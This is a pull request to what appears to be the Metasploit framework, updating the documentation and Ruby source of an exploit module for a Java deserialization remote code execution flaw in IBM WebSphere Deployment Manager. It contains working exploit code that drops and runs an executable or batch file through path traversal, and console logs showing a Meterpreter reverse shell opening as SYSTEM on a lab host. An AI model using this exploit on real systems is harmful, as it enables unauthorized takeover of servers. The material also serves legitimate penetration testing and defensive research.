### PR TITLE
CMD Target Update

### DIFF
--- a/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md
+++ b/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md
@@ -26,36 +26,52 @@ The exploit module contains several targets as detailed below.
 ### Target 0: Windows Powershell Injected Shellcode
 This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
 
-	msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
-	msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set RHOSTS 192.168.162.133
-	RHOSTS => 192.168.162.133
-	msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set LHOST 192.168.162.128
-	LHOST => 192.168.162.128
-	msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set payload windows/meterpreter/reverse_tcp
-	payload => windows/meterpreter/reverse_tcp
-	msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > exploit -j
-	[*] Exploit running as background job 0.
-	msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > 
-	[*] Started reverse TCP handler on 192.168.162.128:4444 
-	[*] 192.168.162.133:11006 - Connected to IBM WAS DMGR.
-	[*] 192.168.162.133:11006 - Server responded
-	[*] 192.168.162.133:11006 - Sending payload: A98f3f3.exe
-	[*] Sending stage (179779 bytes) to 192.168.162.133
-	[*] Meterpreter session 1 opened (192.168.162.128:4444 -> 192.168.162.133:58461) at 2019-02-10 23:00:03 -0500
+```
+msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
+msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > exploit
 
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] 172.22.222.200:11006 - Connected to IBM WAS DMGR.
+[*] 172.22.222.200:11006 - Server responded
+[*] 172.22.222.200:11006 - Sending payload: FOAFKqEH.exe
+[*] Sending stage (179779 bytes) to 172.22.222.200
+[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.200:50575) at 2019-05-30 06:10:39 -0500
+[*] 172.22.222.200:11006 - Disconnected from IBM Websphere DMGR.
 
-### Target 1: Generic Command Callback
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-IPOGIJR
+OS              : Windows 10 (Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > exit
+```
+
+### Target 1: CMD
 This target isn't a formal target. It was added to allow a user to execute commands entirely through the IBM Websphere Application Network Deployment Server remote administration feature. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0.
-	
-	msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
-	msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set RHOSTS 192.168.162.133
-	RHOSTS => 192.168.162.133
-	msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set CMD calc.exe
-	msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > exploit
-	[*] 192.168.162.133:11006 - Connected to IBM WAS DMGR.
-	[*] 192.168.162.133:11006 - Server responded
-	[*] 192.168.162.133:11006 - Executing command: calc.exe
-	[*] 192.168.162.133:11006 - Sending payload: A98f3f3.bat
 
+```
+msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
+msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set target 1
+target => 1
+msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set payload cmd/windows/generic 
+payload => cmd/windows/generic
+msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set cmd "ping -n 10 172.22.222.200"
+cmd => ping -n 10 172.22.222.200
+msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > run
 
-
+[*] 172.22.222.200:11006 - Connected to IBM WAS DMGR.
+[*] 172.22.222.200:11006 - Server responded
+[*] 172.22.222.200:11006 - Executing command: ping -n 10 172.22.222.200
+[*] 172.22.222.200:11006 - Sending payload: uMuOTPtG.bat
+[*] 172.22.222.200:11006 - Disconnected from IBM Websphere DMGR.
+[*] Exploit completed, but no session was created.
+```

--- a/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb
+++ b/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Powershell
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -60,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def cleanup
     disconnect
-    print_status("Disconnected from IBM Websphere DMGR.")
+    print_status('Disconnected from IBM Websphere DMGR.')
     super
   end
 
@@ -71,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
       command = datastore['CMD']
     end
-    # Connect to the BMC Patrol Agent
+    # Connect to IBM Websphere Application Server
     connect
     print_status("Connected to IBM WAS DMGR.")
 
@@ -100,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Sending payload: #{bin_name}")
     enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
     send_msg(enc_stream)
-
+    register_file_for_cleanup(bin_name)
   end
 
   def send_msg(enc_stream)

--- a/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb
+++ b/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb
@@ -36,23 +36,20 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
           [
-            'Generic Command Callback', {
+            'CMD', {
               'Arch' => ARCH_CMD,
-              'Platform' => 'win'
+              'Platform' => 'win',
+              'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}}
             }
           ]
         ],
       'Privileged' => true,
       'DefaultTarget' => 0,
-      'DefaultOptions' => {
-        'DisablePayloadHandler' => true
-      },
       'DisclosureDate' => 'May 15 2019'))
 
     register_options(
       [
         Opt::RPORT(11006), # 11002,11004,11006,etc
-        OptString.new('CMD',      [false, 'command to run on the target. If this option is specified the payload will be ignored.']),
         OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
         OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
         OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
@@ -68,33 +65,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # Manually start the handler if not running a single command
-    if datastore['CMD'].nil? || datastore['CMD'].empty?
+    command = nil
 
-      # Set to nil if the cmd is empty for checks further down
-      datastore['CMD'] = nil
-      datastore['DisablePayloadHandler'] = false
-
-      # Configure the payload handler
-      payload_instance.exploit_config = {
-        'active_timeout' => 300
-      }
-      # Setup the payload handler
-      payload_instance.setup_handler
-
-      # Start the payload handler
-      payload_instance.start_handler
-
+    if target.name == 'CMD'
+      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
+      command = datastore['CMD']
     end
-
     # Connect to the BMC Patrol Agent
     connect
     print_status("Connected to IBM WAS DMGR.")
-
-    command = nil
-    if !datastore['CMD'].nil? && !datastore['CMD'].empty?
-      command = datastore['CMD']
-    end
 
     node_port = datastore['RPORT']
 
@@ -107,21 +86,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Generate binary name
     bin_name = rand_text_alpha(8)
-    if command.nil?
-      payload_contents = generate_payload_exe(code: payload.generate)
-      bin_name += ".exe"
-    else
+
+    if command
+      command = datastore['CMD']
       payload_contents = command.to_s
       print_status('Executing command: ' + payload_contents)
-      bin_name += ".bat"
+      bin_name << ".bat"
+    else
+      payload_contents = generate_payload_exe(code: payload.generate)
+      bin_name << ".exe"
     end
 
-    print_status('Sending payload: ' + bin_name)
+    print_status("Sending payload: #{bin_name}")
     enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
     send_msg(enc_stream)
 
-    # Handle the shell
-    handler
   end
 
   def send_msg(enc_stream)


### PR DESCRIPTION
Update CMD target to generic compatibility.
Check for target selection and use of the generic payload that disables the default handler.
Removes the need for manually disabling or setting up of payload handler.

If the module is ran multiple times it seems like there needs to be a certain amount of time since the last successful attempt for the module to work successfully again. Have you encountered this issue as well?

## Verification

List the steps needed to make sure this thing works

- [ ] `./msfconsole -q`
- [ ] `use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce`
- [ ] `set rhosts <rhost>`
- [ ] `exploit`
- [ ] Get a shell
